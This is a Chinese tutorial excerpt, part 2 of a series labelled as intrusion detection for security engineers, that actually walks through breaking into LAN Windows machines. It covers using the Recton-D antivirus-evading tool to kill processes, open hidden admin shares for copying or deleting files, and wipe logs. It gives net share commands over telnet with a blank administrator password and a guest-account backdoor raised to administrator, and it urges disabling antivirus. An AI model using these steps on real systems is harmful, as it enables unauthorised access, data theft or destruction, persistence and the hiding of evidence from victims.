网络安全工程师教程：局域网入侵检测全过程(2)

　　2.Recton-D贺免杀专用版还有其他功能，在\"进程\"项中，可以查看远程主机的进程，并可任意结束其中进程;在\"共享\"项中，可以创建共享，我常用的是创建C$,D$,E$,F$,共享路径分别对应C：\\,D：\\等，共享好后在地址栏中输入\\\\IP\\C$,进入对方C盘，你就可以随意复制删除里面的东西了，而且这种共享对方机子盘符上不会显示共享图标，也就不会被发现，弄完后最好还是把共享给关掉。最后选\"日志\"，清除所有日志，不留痕迹。这个软件会被杀毒软件当作病毒杀掉，用它时须将实时防毒关掉。

　　3.上面的共享可通过CMD(程序-附件-命令提示符)完成，首先\"telnet IP\",telnet上去,键入y后输入的用户名\"administrator\",密码为空, 进入后，开共享用net share命令，共享C$(即C盘)：\"net share C$=C：\",共享system文件夹：\"net share c=c：\\winnt\\system32\",共享IPC$用：\"net share IPC$\"等,最后是关闭共享，关闭C盘共享：\"net share C$ /del\"。

　　4.为方便下次入侵，可以设置后门， 查看用户：\"net user\",激活guest用户

　　\"net user guest /active：yes\",更改guest的密码为poco：\"net user guest poco\",把guest的权限提升为管理员权限：\"net localgroup administrators guest /add\"。

　　5.telnet命令(dos命令)很多，可去网上查找它的命令，常用的有：查看D盘文件：\"\"dir d：\\\",查看C盘program file文件夹：\"dir c：\\PROGRA~1\\;\",60秒倒记时关机：\"shutdown -s -t 60\"

　　补充说明：

　　1.net use错误原因解决：

　　(1).\"发生系统错误 1326。 登录失败： 未知的用户名或错误密码。\"

　　在远程机的\"控制面板-文件夹选项-查看-简单的文件共享\",去掉选取,然后再尝试连接。简单文件共享会把网络连接权限都归为 guest连接，是无法访问C$等管理共享的.

　　(2)\"发生系统错误 1327。 登陆失败：用户帐户限制。可能的原因包括不允许空密码，登陆时间限制，或强制的策略限。\"在远程机的\"控制面板-管理工具-本地安全策略-安全选项-用户权限\"指派里，禁用\"空密码用户只能进行控制台登陆\".

　　(3)\"//IP/c$\"时提示找不到网络途径。在\"网络和拨号连接\"中\"本地连接\"中选取\"Internet协议(TCP/IP)\"属性，进入\"高级TCP/IP设置\"选\"WINS设置\"里面有一项\"启用TCP/IP的NETBIOS\".